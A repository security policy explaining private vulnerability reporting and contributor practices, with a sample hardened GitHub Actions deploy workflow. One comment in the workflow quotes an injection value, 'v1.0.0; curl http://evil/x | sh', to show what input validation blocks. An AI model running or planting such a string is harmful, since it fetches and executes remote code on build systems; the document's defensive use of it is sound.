Please do not report security vulnerabilities through public GitHub issues.
Instead, please use GitHub's private vulnerability reporting:
- Go to the Security tab of this repository
- Click "Report a vulnerability"
- Fill out the form with details

Please include as much of the following as you can:
- Type of issue (e.g., XSS, command injection, secret exposure)
- Full paths of affected source files
- Step-by-step instructions to reproduce
- Proof-of-concept or exploit code, if possible
- Impact assessment and potential attack scenarios

I will respond within 48 hours and work with you to understand and address the issue.
Only the latest version receives security updates. Please always use the most recent release.
Security practices for contributors and users of this repository:
- Never commit secrets to the repository. Keep them in Kubernetes Secrets, External Secrets, or CI secrets.
- Validate user-provided values before they reach templates or workflow steps; treat workflow inputs as untrusted.
- Keep dependencies updated. Dependabot is enabled on this repo.
- Prefer least privilege in containers, RBAC, and GitHub workflows: grant only the permissions a job or pod actually needs.
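The following GitHub Actions workflow is an added example, not one of this repository's own workflows, showing three of the practices above together: the default `GITHUB_TOKEN` is scoped to read-only, a user-supplied input is validated and passed through an environment variable instead of being interpolated into the script, and the kubeconfig comes from a CI secret rather than the repo. The workflow name, input names, secret name `KUBECONFIG`, image path and `deployment/app` target are assumptions.

```yaml
# Added example (not part of this repository's own workflows).
# Names of inputs, the secret, the image and the deployment are assumed.
name: deploy

on:
  workflow_dispatch:
    inputs:
      environment:
        description: "Target namespace"
        required: true
        type: choice
        options: [staging, production]
      release_tag:
        description: "Release tag to deploy (e.g. v1.4.2)"
        required: true
        type: string

# Least privilege: GITHUB_TOKEN can only read the repository by default.
# Raise individual scopes per job, only where that job needs them.
permissions:
  contents: read

jobs:
  deploy:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      id-token: write   # only needed if the job obtains cloud credentials via OIDC
    steps:
      - uses: actions/checkout@v4

      # Validate user-provided values. The input is read from an environment
      # variable, never written into the script with ${{ }}, so a value such as
      # "v1.0.0; curl http://evil/x | sh" cannot alter the command that runs.
      - name: Validate release tag
        env:
          RELEASE_TAG: ${{ inputs.release_tag }}
        run: |
          if ! printf '%s' "$RELEASE_TAG" | grep -Eq '^v[0-9]+\.[0-9]+\.[0-9]+$'; then
            echo "refusing to deploy: release_tag '$RELEASE_TAG' is not a semantic version tag" >&2
            exit 1
          fi

      # Never commit secrets: the kubeconfig is a base64-encoded CI secret
      # (assumed name KUBECONFIG) written with owner-only permissions to the
      # runner's temp directory for the duration of the job.
      - name: Deploy
        env:
          KUBECONFIG_B64: ${{ secrets.KUBECONFIG }}
          RELEASE_TAG: ${{ inputs.release_tag }}
          TARGET_NS: ${{ inputs.environment }}
        run: |
          umask 077
          printf '%s' "$KUBECONFIG_B64" | base64 -d > "$RUNNER_TEMP/kubeconfig"
          export KUBECONFIG="$RUNNER_TEMP/kubeconfig"
          # Hypothetical rollout target; adjust to the real deployment and image.
          kubectl set image "deployment/app" \
            app="ghcr.io/${GITHUB_REPOSITORY}:${RELEASE_TAG}" \
            --namespace "$TARGET_NS"
```

The same pattern applies to any step that consumes `github.event.*` fields (issue titles, PR branch names, commit messages): route them through `env:` and validate them in the shell, and keep the top-level `permissions:` block minimal so a compromised step cannot push code or publish releases with the job token.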
For security questions that aren't vulnerabilities, open a regular issue or start a GitHub Discussion.